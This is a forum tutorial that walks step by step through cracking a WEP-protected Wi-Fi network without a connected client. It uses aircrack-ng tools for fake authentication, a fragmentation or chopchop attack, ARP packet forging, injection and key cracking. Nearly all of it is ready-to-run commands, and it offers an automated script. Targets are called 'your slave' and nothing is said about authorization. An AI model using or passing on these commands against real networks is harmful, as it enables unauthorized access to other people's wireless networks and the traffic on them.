Cracking WEP without a client! Old but still current ;)

Hi, Qkyrie here

background

after reading quite some tutorials in the past, I noticed most of the tutorials used a simple injection technique, which does not always work on certain routers.

That's why I thought, why not write a second tutorial, that covers another type of injection? And here's the final result..
The Chopchop- or fragmentation attack..

ChopChop? Fragmentation?

What we will be doing will be basically the same as in other tutorials, though there will be one big difference, the injection.
Basically, what we will be doing is:

• using aireplay-ng to do a fake authentication with the access point
• Using aireplay-ng chopchop or fragmenation attack to obtain PRGA
• Using packetforge-ng to create an arp packet using that PRGA
• Inject the created arp packet

enough background, here comes the real deal

Knowing what interface to use

first of all, you'll have to know what the name of your wireless interface is, thats why you type:

Code:

iwconfig

Identifying your slave

Code:

airmon-ng start INTERFACE

you'd get a small message saying:
(monitor mode enabled on SPOOFEDINTERFACE ) //In my case, interface was "mon0"..

Code:

airodump-ng SPOOFEDINTERFACE

If you already know what channel your slave is on, you can use the argument "-c CHANNEL"..

write down the BSSID and ESSID, the CHANNEL can come in quite handy too.
use Ctrl + C if you wrote everything down..



getting started with aireplay

the first aireplay command:

Code:

aireplay-ng -1 6000 -o 1 -q 10 -e SSID -a BSSID -h YOUROWNMAC SPOOFEDINTERFACE

this will perform an pseudo-authentication with the router.



The Fragmentation Attack

Code:

aireplay-ng -5 -b BSSID -h YOUROWNMAC SPOOFEDINTERFACE

Sometimes, this technique fails, if this happens, this fragmentation attack was unable to recover the PRGA, you should try the ChopChop technique then..



Chopchop technique - only necessary when the Fragmentation attack doesnt work

Code:

aireplay-ng -4 -h YOUROWNMAC -b BSSID SPOOFEDINTERFACE

-4 means we are using the chopchop technique. Since in my case the Fragmentation attack always works, I don't have a picture of a chopchop technique, but visually, it should give you the same outcome, though it might take longer..

PacketForge, our tool to create the ARP-packet

Code:

Packetforge-ng -0 -a BSSID -h YOUROWNMAC -k 255.255.255.255 -l 255.255.255.255 -y fragment-*.xor -w arp-packet

this will create the ARP-packet with the information of your chopchop or fragmentation technique.. It writes the packet as "arp-packet"..

Turn on Airodump to start capturing data

Code:

airodump-ng -c CHANNEL --bssid BSSID -w out SPOOFEDINTERFACE

this will start airodump on channel "CHANNEL" and will write everything to the file "out"..

start injecting your crafted packet

it's start to inject right, to get the datarate up. here's the command for this, open up new terminal and start this.

Code:

aireplay-ng -2 -r arp-packet SPOOFEDINTERFACE

Aircrack-ng

Once you've gathered enough packets, use the aircrack command to start cracking it. I sometimes leave to aircrack function running from the beginning. It restarts after a certain amount of time ;-)

Code:

aircrack-ng -b BSSID out*.cap

That's it


Just for you guys, I have a small extra. If you want an automated version of this, i'll give you the script. All you have to adapt is the spoofed interface and the original interface. Mine was mon0 and wlan0, yours will probably be something different.
The script can be found here:
Download personalcrack.sh

If you happen to have any questions, feel free to ask them ;-)


@_Qkyrie_